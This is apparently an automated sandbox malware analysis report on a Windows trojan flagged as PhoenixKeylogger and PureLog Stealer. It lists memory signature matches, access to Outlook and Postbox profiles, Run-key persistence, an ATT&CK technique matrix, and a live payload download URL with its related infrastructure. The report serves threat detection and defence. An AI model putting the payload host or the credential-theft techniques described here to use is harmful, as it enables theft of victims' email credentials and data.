Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR

Remote Access Functionality

Yara detected PhoenixKeylogger

Source: Yara match	File source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.Qulzerug.exe.3af9550.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.75a0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6660040.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.3af9550.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.75a0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.687f060.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.687f060.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6660040.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1526328229.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	2 OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6Ek4nfs2y1.exe	71%	ReversingLabs	Win32.Trojan.Leonem
6Ek4nfs2y1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Qulzerug.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Qulzerug.exe	71%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Label
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
https://github.com/mgravell/protobuf-net	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-netJ	0%	Avira URL Cloud	safe
http://ifconfig.me/ip	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-neti	0%	Avira URL Cloud	safe
https://nexoproducciones.cl/Qlnxkam.datt	0%	Avira URL Cloud	safe
https://nexoproducciones.cl	0%	Avira URL Cloud	safe
https://nexoproducciones.cl/Qlnxkam.dat	0%	Avira URL Cloud	safe
http://ifconfig.me	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nexoproducciones.cl	104.21.10.178	true	false		unknown
ifconfig.me	34.117.118.44	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ifconfig.me/ip	false	Avira URL Cloud: safe	unknown
https://nexoproducciones.cl/Qlnxkam.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-net	6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nexoproducciones.cl/Qlnxkam.datt	6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nexoproducciones.cl	6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ifconfig.me	6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.117.118.44	ifconfig.me	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.21.10.178	nexoproducciones.cl	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467001
Start date and time:	2024-07-03 16:16:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6Ek4nfs2y1.exe renamed because original name is a hash value
Original Sample Name:	c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/4@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 111 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 6Ek4nfs2y1.exe

Simulations

Behavior and APIs

Time	Type	Description
10:16:55	API Interceptor	29x Sleep call for process: 6Ek4nfs2y1.exe modified
10:17:10	API Interceptor	111x Sleep call for process: Qulzerug.exe modified
16:17:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qulzerug C:\Users\user\AppData\Roaming\Qulzerug.exe
16:17:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qulzerug C:\Users\user\AppData\Roaming\Qulzerug.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.118.44	SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe	Get hash	malicious	Unknown	Browse	ifconfig.me/ip
	SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe	Get hash	malicious	Unknown	Browse	ifconfig.me/ip
	lQV0SgKoqe.exe	Get hash	malicious	Unknown	Browse	www.myexternalip.com/raw
	lQV0SgKoqe.exe	Get hash	malicious	Unknown	Browse	www.myexternalip.com/raw
	Jv7Z27rOoW.exe	Get hash	malicious	Unknown	Browse	/
	Jv7Z27rOoW.exe	Get hash	malicious	Unknown	Browse	/
	file.exe	Get hash	malicious	Unknown	Browse	ifconfig.me//
	file.exe	Get hash	malicious	Unknown	Browse	ifconfig.me//
	file.exe	Get hash	malicious	Unknown	Browse	ifconfig.me//
	x3oDq746Ub.exe	Get hash	malicious	Trickbot	Browse	ipecho.net/plain
104.21.10.178	Solicitud de presupuesto_____________________________.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	nexoproducciones.cl/Cmtjdjn.wav

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nexoproducciones.cl	q86onx3LvU.exe	Get hash	malicious	PureLog Stealer	Browse	104.21.10.178
	filesno5670023475729374.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	Transferir copia________________pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	Solicitud de presupuesto_____________________________.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	Orders34754733________________________pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.146.41
ifconfig.me	uJ5c4dQ44E.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	uJ5c4dQ44E.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	Jv7Z27rOoW.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	Jv7Z27rOoW.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	file.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	file.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	file.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	mhddos_proxy_win.exe	Get hash	malicious	Unknown	Browse	34.117.118.44

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	Safeguard and Grow Your Assets.html	Get hash	malicious	Unknown	Browse	34.117.186.192
	http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl	Get hash	malicious	HTMLPhisher	Browse	34.117.186.192
	https://gilbertnow.com/lscache/?initiate=kZwivKCdReGfjYUlVXF2v3UdvZ9rRqUivH	Get hash	malicious	Unknown	Browse	34.117.146.176
	https://docs.google.com/presentation/d/e/2PACX-1vRs-1lM259_-Jwhsbc-dg0JIYZUboF3mrOYVHYTqbAmT7KWBl_mwNRSNl0N9QrU4kN-s-_PFfno5ZP3/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	34.66.3.160
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	34.117.186.192
	16bfcGvz5N.elf	Get hash	malicious	Unknown	Browse	34.118.114.113
	http://www.escalon.services	Get hash	malicious	Unknown	Browse	34.118.20.215
	https://rlcold.com/projects/	Get hash	malicious	Unknown	Browse	34.66.179.7
	Cheat.malware_exe.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
CLOUDFLARENETUS	https://www.filemail.com/t/RuKZYfeB	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	kZa81nzREg.exe	Get hash	malicious	AgentTesla	Browse	172.67.196.55
	q86onx3LvU.exe	Get hash	malicious	PureLog Stealer	Browse	104.21.10.178
	d8gZVaN0ms.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar	Browse	188.114.96.3
	https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://link.mail.beehiiv.com/ls/click?upn=u001.I67xw9O-2FCIng4d3bGWl4wF1gb7u7ov5hHZyE-2Bbx9UTzw17nXfIKdJcwxuwzDNoy2zqPLSJo-2BNEQCUif7aqDwom-2FNyeTx4oiB0wLXwXnzsK4D0yrlxIKEkPM7Cj-2FHMmK1N5sLNWwmlbyGbHeuv6ehAEECnEs6fFQOqqwD-2FKToPwl8ZCnBHVdQ3QU8RWhloPcfXcxa_hzdxOAnI3B-2BYhj5tgQXSRCdoGEcuM88dXETG-2BahO6Uvd8cr2jZPTzAVk72oAubAHPgVJjhCdU6bjbXnflniNIkDzPhLxyvQL1dSWfR-2BUbH1DS3LUwJipSkZoP8d1ryYR0TIdt5CyNutkaFy6gLHYcR4kl-2Fz1ezOldYW2WX0ghZl4CCdgYPK2Cj3fM7MmBqLOIY-2B5u5WgDkBzfdFRbwHzvpAejc0JJJ7tYmz-2BUzjH-2BoYmk-2F0HGjFVUaYNWyGnhGX4EhZzw6qOcJEaxZhVjnDpWPL3U5gs5ZetaaeYkMX5whQyh7U-2B0b4Qj0LqFla1tJlWVR4EZMTu40FIJ9BSbWnjEcc9JxuCrqAu48-2BpVmjPzA43qg6bd2x0AWoed1RbQeWVzBT648qZJ7L-2FqgKPY6ysg2U7IBuGeVI7oxhhKCbXSZln5jVQGdCxXpADLZSMla5T1Id6eeDoJeYo7zr6VqE6vw-3D-3D#aGFydG11dC5zY2htaWR0QGtwcy1jb25zdWx0aW5nLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.2.184
	8bwKawHg0Z.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	7RsDGpyOQk.exe	Get hash	malicious	FormBook	Browse	104.21.84.69
	ptKNiAaGus.exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	Quarantined Messages (1).zip	Get hash	malicious	HTMLPhisher	Browse	172.67.148.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	q86onx3LvU.exe	Get hash	malicious	PureLog Stealer	Browse	104.21.10.178
	tgBNtoWqIp.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.10.178
	19808bS58f.exe	Get hash	malicious	AgentTesla	Browse	104.21.10.178
	SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exe	Get hash	malicious	AgentTesla	Browse	104.21.10.178
	dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs	Get hash	malicious	Unknown	Browse	104.21.10.178
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	104.21.10.178
